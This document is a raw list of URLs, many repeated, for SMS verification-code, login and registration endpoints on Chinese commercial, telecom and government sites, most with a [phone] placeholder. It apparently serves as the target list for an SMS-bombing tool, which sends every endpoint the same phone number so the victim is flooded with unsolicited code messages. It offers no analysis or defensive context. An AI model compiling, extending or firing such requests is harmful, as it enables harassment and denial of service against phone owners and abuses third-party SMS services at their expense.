"https://gateway-api.kuainiujinke.com/etrack/record?date=2019-09-02&refer=https%3A%2F%2Fwww.daishangqian.com%2Fm%2F%23%2Fuser%2Flogin&source=dsq&timestamp=1567390955843&traceId=A15C586B-6CFF-47C7-81FF-3ACFFB39D046&uid=&url=https%3A%2F%2Fwww.daishangqian.com%2Fm%2F%2", - "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", - "https://api.1sapp.com/captcha/getSmsCaptcha?GUID=9b079137577015d58e0428cbae5.61417812&OSVersion=12.4&active_method=icon&deviceCode=5C351103-F887-4932-BC59-58C75875EFDE&distinct_id=&dtu=100&lat=29.58959433282935&lon=106.281065329089&network=WIFI&sign=73ffc97fcc0d33c", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=%2B86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=3cab2a2b042928518869ab9fee57ce03&user_domain=cc", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "https://papa.51nbapi.com/mobile/app/phoneCheck?phone=[phone]&appName=sujiebaitiao&appChannel=AppStore&appVersion=1.2.0&appDevice=I", - "http://qhg.api.nbxuanma.com/api/VerifyCode/Send?Phone=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "https://api.1sapp.com/captcha/getSmsCaptcha?GUID=9b079137577015d58e0428cbae5.61417812&OSVersion=12.4&active_method=icon&deviceCode=5C351103-F887-4932-BC59-58C75875EFDE&distinct_id=&dtu=100&lat=29.58959433282935&lon=106.281065329089&network=WIFI&sign=73ffc97fcc0d33c", - "http://www.henhuoapp.com/api/method/getCode?phone=[phone]&type=1", - "http://sqb.xiaoshijie.com/api/1/user/getCaptcha/?_did=00000000-7998-6e7e-026a-0aa25c86693a&_app=sqbao&_atype=android&_network=2&_networkType=0&_t=1556866758&_swidth=1080&_sheight=1920&_imei=861913032338784&_manufacture=ZTE&_model=ZTE+BV0730&_osver=6.0&_tn=0&_st=0&i", - "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]&comefrom=7&auth=&msgtype=0", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", - "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=21", - "http://www.jxxw.com.cn/app/user/sendLoginCode?username=[phone]&sign=572bf336d708a2b8b655ea05872cb596", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://put.zoosnet.net/lr/sendnote160711.aspx?tel=[phone]&ccode=&id=PUT60101350&sid=72a49eb9c9b94b2692a44daa50e2011c&cid=72a49eb9c9b94b2692a44daa50e2011c&lng=cn&p=http%3A//www.lxcpa.net/&e=&un=&ud=&on=&d=1589617104719", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://app.quanlaoda.com/app.php?&m=code&a=send_login_code&phone=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?_ts=1564136775711&country=%2B86&mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]&_=1506486656411", - "http://www.dangaoss.com/h5/acc/send_code?_t=1552475308&sign=424064b2d2d003d83db05380438824cb&username=[phone]", - "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", - "http://user.daojia.com/user/getSmscode?mobile=[phone]&bu=", - "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=%2B86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=3cab2a2b042928518869ab9fee57ce03&user_domain=cc", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://api.wangxiao.cn/app/user.ashx?mobile=[phone]&t=mobilelogincode", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://open.taou.com/maimai/account/v5/send_reg_login_code_v3?ts=1564817141875&access_token=&appid=4&channel=AppStore&density=2&device=iPhone8%2C1&imei=5C351103-F887-4932-BC59-58C75875EFDE&launch_uuid=10c094ac9b334bbda6d4f2d251d0501f&mobile=%2B86-[phone]&net=wifi&", - "http://i.vaakwe.com/user/reg_send_code.php?mobile=[phone]&country=0086&udid=a884f6c7f15ff08a97ab16e4d33fe2c216a9ebed&imei=02:00:00:00:00:00&mac=02:00:00:00:00:00&imsi=02:00:00:00:00:00&token=ba4edbf30bc5363ba02875fc4c6b25c8a21ed8a99e21c5c40ff6385c43c71c8b&type=sms&", - "http://tel.kuaishang.cn/ajax.php?act=sendmsg&author=%E9%BD%90%E6%99%A8&fromurls=http%3A%2F%2Fwww.mianfeidianhua.net%2Fhsnzy.html&content=%E6%83%B3%E5%92%A8%E8%AF%A2%E3%80%82&did=382&uid=2010131726&phone=[phone]&_=1551173567919", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://api.hsj.huanci.net/index.php/api/user/isPhoneRegister?appVer=1.1.0&cur_user_id=-1&device=iPhone 6S&device_brand=Apple&device_model=iPhone&os_version=12.4&phone=[phone]&platform=iOS&token=&userId=-1&version_code=110", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://www.pureyeah.com/public/api/auth/getVerificationCode?mobile=[phone]&dispatch=", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=23", - "http://kyddn.log56.com/sq_server/verifyCode.action?mobile_no=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://m.business-steward.com/ticket/application/message/send_msg.php?tel=[phone]&type=forget", - "http://splus.bianfeng.com/index.php?r=findAccount/SendCode&rnd=&a=[phone]", - "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=112", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://app.zhigoukeji.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=e6d1fbbdcd5975b310190544e9f45015", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://m.business-steward.com/ticket/application/message/send_msg.php?tel=[phone]&type=forget", - "https://app.quyiyuan.com/APP/user/action/LoginAction.jspx?APPOINT_SOURCE=0&CHANNEL_ID=&IMEI_ID=3ECFD13A-235B-47A9-A9E1-F4DCC64D360F&PHONEOPERATINGSYS=2&PHONETYPE=iPhone8,1&PHONEVERSIONNUM=12.4.1&PHONE_NUMBER=[phone]&PUBLIC_SERVICE_TYPE=0&hospitalID=&isRead=1&loc=c&", - "http://bank.wo.cn/wxun/api/my/getSmsCode?mobile=[phone]", - "http://vapi.yuike.com/1.0/user/is_register.php?phone=[phone]&sign=69f0ce3725947d7f9d6b798e68700f3a&yk_pid=3&yk_appid=1&yk_cc=yuikemall&yk_cvc=319&mid=457465", - "https://cloud.maitao.com/auth/code?cityId=2&uid=&cfbundleversion=5.12.0&imei=32E30496-2A31-463B-A1BD-75B005303E41&channelid=AppStore&devicetoken=69103da60f6eca7a15a995f4f33371ce6413567d5df01d1335f6ab25a47a2f3c&fromapp=1&token=05F452E3F79B7410AC8962C7445483E81AD2ACC", - "https://esx.3z.cc/index.php?tp=api/send_sms&device_type=iPhone%206s&uid=0&op=reg&appid=6&imei=5C351103-F887-4932-BC59-58C75875EFDE&t=1566798214&pt=2&sign=8737393a0d7dffc46883c5226d482194&ver=1.2.1&phone=[phone]", - "http://i.zhaopin.com/Login/LoginApi/SendBindSms?jsoncallback=jQuery16402676061029242586_1454143948438&businessType=C-Bind&t=1454143948656&_=1454143948656&mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://m.logofree.cn/misc.php?act=send_sms&m=[phone]&token=f3c95f20b6628ae17a40111ebf4170e8", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", - "http://www.imdxd.com/api/method/getCode?phone=[phone]&type=2", - "https://masterhands.yladm.com/user/phone/verifycode?app=gaoshou_i&brand=apple&idfa=5C351103-F887-4932-BC59-58C75875EFDE&model=iphone&phone=[phone]&refer=hometabpage&sid=appstore&sign=dfe50ccd14bb2c905e37b4706c5e633c&tcid=5f401e59cddf4345a511010d2c268592&timestamp=1", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://m.mgqr.com:443/ajax/getcode.ashx?check=0&t=1586567002298&phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://m.mgqr.com:443/ajax/getcode.ashx?check=0&t=1586567002298&phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://gateway-api.kuainiujinke.com/etrack/record?date=2019-09-02&refer=https%3A%2F%2Fwww.daishangqian.com%2Fm%2F%23%2Fuser%2Flogin&source=dsq&timestamp=1567390955843&traceId=A15C586B-6CFF-47C7-81FF-3ACFFB39D046&uid=&url=https%3A%2F%2Fwww.daishangqian.com%2Fm%2F%2", - "http://vapi.yuike.com/1.0/user/is_register.php?phone=[phone]&sign=69f0ce3725947d7f9d6b798e68700f3a&yk_pid=3&yk_appid=1&yk_cc=yuikemall&yk_cvc=319&mid=457465", - "http://b2c.csair.com/portal/smsMessage/EUserVerifyCode?mobile=[phone]", - "http://passport.ks5u.com/RPAjax.ashx?Param=009&PhoneNum=[phone]", - "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]&_=1570683350704", - "https://appapi-h5.yongche.com/Common/CreateAuthCode?cellphone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "https://api.wanwudezhi.com/module-user/api/v1/user/sendSmsCode?phone=[phone]", - "http://www.gangaimall.com/mbb-web/api/account/code?mobile=[phone]&type=0", - "https://appapi.moretickets.com/userapi/pub/v1_1/send_sms_for_regist?cellphone=[phone]&code=&isSupportSession=1&src=ios&token=5d3fa06f6d96f74c953459ba&ver=5.1.2", - "http://mobile.health.pingan.com:80/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data=%7B%22phone%22%3A%22[phone]%22%2C%22type%22%3A%223%22%2C%22userId%22%3A%22%22%7D&head=%7B%22account%22%3A%22android01%22%2C%22channel%22%3A%22C0001%22%2C%22channelSecond%22%3A%22CS0001%22%2C%22pa", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]&_=1551173567991", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://www.pureyeah.com/public/api/auth/getVerificationCode?mobile=[phone]&dispatch=", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://appsource.taohv.cc/user/sendRegisterCode.php?version_android=4.1.9&channel_android=lianxiang&mobile=[phone]&code=&sign=21119a7fa9bbb06b6470ce49db996711", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=17", - "http://reg.uuyoyo.com/AshxHandler/AjaxRegHandler.ashx?action=reg_phone_code_send&_=&phone=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://msg.106117.com/submit_ajax.ashx?callback=jQuery11120017795995642418072_1558097551516&username=[phone]&action=getValidate&_=1558097551517", - "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", - "https://iosapi.shixiseng.com/app/telrandcode?sign=6F4C6784400B289D3B0BC2742D704E59&tel=[phone]&time=1564926500.453583&type=reg", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "https://appapi.51job.com/api/user/get_verification_type.php?mobilephone=[phone]&nation=CN&type=0&format=json&guid=56fa5d7a032a8190dd9844ebaa211181&partner=237b12de4c48eacec5a368eb192c3c5e&productname=51job&uuid=e7ab248c2ba73cb851a1eb31aa138695&version=869", - "http://passport2.chaoxing.com/num/phonecode?phone=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=103", - "http://i.xfvw.cn/api/sms/send?mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://esx.3z.cc/index.php?tp=api/send_sms&device_type=iPhone%206s&uid=0&op=reg&appid=6&imei=5C351103-F887-4932-BC59-58C75875EFDE&t=1566798214&pt=2&sign=8737393a0d7dffc46883c5226d482194&ver=1.2.1&phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", - "http://slb-sport.vesal.cn:80/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=25", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=112", - "http://www.zkzcfu.cn/api/sms/send?mobile=[phone]&event=register", - "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]", - "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA%2BuIMWLFLQzyVfRCP1db%2B11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", - "https://app.api.ke.com/user/account/sendverifycodeforbindmobilev2?mobile_phone_no=[phone]&request_ts=1564116332", - "http://ttq.api.yolanda.hk/api/v5/users/identifying_code.json?address=&app_id=TTQ&app_revision=2.2.2&cellphone_type=iPhone%206s-12.4&login=[phone]&mob_type=1&platform=iphone&send_type=1&systemLaunguage=zh-Hans-CN", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%2524%2524QD8balMbMtSRigOLwJkGjU%2540%2540PIsjj1rTgAEWBZDHlnw3%2540%2540Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://iu.snssdk.com/user/mobile/send_code/?iid=80794405933&type=1&mobile=[phone]&ac=WIFI&channel=App%20Store&app_name=joke_zone&aid=27&version_code=2.2.0&device_platform=iphone&os_version=12.4&device_type=iPhone8,1&device_id=68923678300&vid=FFAA4EA8-1E5C-4EA0-9A1E", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "https://cloud.haoyunbang.cn/user/sms/send?mobile=[phone]&appId=ios_15196397349756&t=1565073179646&sign=70723c9c61730237de0b97a02395e103", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://cap.caocaokeji.cn/bps/sendVerifyCode/2.0?appCode=2WZ2JRQR708W&appVersion=4.3.2&buildVersion=192&clientType=1&deviceId=5C351103-F887-4932-BC59-58C75875EFDE&fullVersion=4.3.2.192&isJailBreak=0&mobileType=ios&phone=[phone]&sign=FB3ED4C94F2877A29366F19C4A7CED68", - "http://skyapp.mackentan.com/app/v5/login/verifyuser.do?t=1565488775000&did=EVrRL0SJdF8b4aa87b41&ver=170&it=434857&username=[phone]&fit=434857&sign=df42d291c6c8487aab384f3da2f5a42f6920e76b&appid=com.jediapp.changgejiaoxue&idfa=5C351103-F887-4932-BC59-58C75875EFDE", - "https://plus-api.kankan.com/user/login/sms?from=IOS&mobile=[phone]&sign=b41e46a3446472eaca2c0d0618eb7abd&terminal=IOS", - "https://puser.hnzwfw.gov.cn:8081/api/user/sms?mobile=[phone]&_=1590559098473", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "https://appapi-h5.yongche.com/Common/CreateAuthCode?cellphone=[phone]", - "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "https://hdgateway.zto.com/auth_account_sendLoginOrRegisterSmsVerifyCode?mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://server.daiyudianjing.com/User/GetShortMessage?phone=[phone]&type=0&Timestamp=1562547880955&Nonstr=4A4EC434EC1697BAB69253B3293FF032", - "https://couple-api.jizhangapp.com/login/captcha/[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://b.hongkedou.com/phoneVerifyCode/getVerificationCode?phone=[phone]&business=buyer-register", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://activity.renren.com:80/livecell/ajax/tryVerify?sanbox=a&phoneNum=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=22", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307700360712450502_1523359569433&mobile=[phone]", - "http://user.daojia.com/user/getSmscode?mobile=[phone]&bu=", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=18", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=14", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "https://m.rong360.com/mobile/Wxpageforapp/SendSmsVcode?mobile=[phone]&callback=rong_json1565594522310&v=7620", - "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307125578716707999_1546707858677&_=1546707872507&mobile=[phone]", - "http://gw.dianzuanmao.com/user/getCsbCode?phone=[phone]&type=1", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://donutenglish.koolearn.com/api/message/send_vcode?callback=jQuery111009421744498287961_1580993309090&use=5&sign=1CE8E4BE7B71ABA57CBF20762AF78A0C&mobile=[phone]&app_id=29&_=1580993309093", - "https://appapi.che168.com/phone/v55/user/CreateRegLoginMobileCode.ashx?_appid=2scapp.ios&_sign=bd185e04d8bdb0422467b0f95f828b49&appversion=7.7.0&channelid=App%20Store&ip=192.168.43.151&mobile=[phone]&udid=5WklXEFrvscsddZR8s3TrLI45Bg0YEW9MkEFqRLSrR1ZKpY81h2wTw8pEHBo", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=&app_code=ECS-YH-WAP", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=11", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://user.app.nanrenbang.in/user/user/getvalidate?phone=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://yueban.500zhuan.com/tools/getNum?&phone=[phone]&sign=20f2f798a813a8115f5a837c7cad140b&timestamp=1566033453", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://api.v2.msparis.com/common/mobile?channel=App%20Store-vest&clientId=msparis-ios-4.2.4-vest&mobile=[phone]&platform=ios-vest&rent_mode=2", - "https://passport.bignox.com/sso/o2/sms?method=send_mobile_login_sms&mobile=[phone]&operation=login&request_token=RT-946987-zwaBUfZnSTD2qfrc04fvX9J2Pd7AyN-bignox.com", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://weizhang.58.com/user/login/getcode?mobile=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "https://gwc.drugs360.cn/index.php?r=UserCenter/getCellphoneCode&type=4&cellphone=[phone]&city=%E9%87%8D%E5%BA%86%E5%B8%82&lat=29.593100&lng=106.291519&version=6.1&os=ios&auth=1&sign=1ae1dda00913d0707905455258cd5045", - "http://wx.cq3g.cn/shop/sendSmsCode?phone=[phone]", - "http://m.cstm.org.cn/wxReg/regPhoneCheck?regPhone=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "https://babyheartapi.ihealthbaby.cn/BabyheartServer/sms/sendMessage?sendType=1&smsType=1&tel=[phone]", - "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "http://newm.yktour.com.cn/api/captcha/login/info/get?mobile=[phone]", - "http://m.yhk188.com/register/sendAppRegMsg.dos?channel=1&mobilephone=[phone]&time=8a0aae56fd56e3d023102a88e57a4a594a1625c5769a666d42a35e5b5933c01b&type=1&version=1.6.1", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://m.edaogou.mobi/appweb/user.ashx?act=sendCode&typ=register&mobile=[phone]&_=1551173567948", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://www.51qub.com/member/sendmobilesms?mobile=[phone]", - 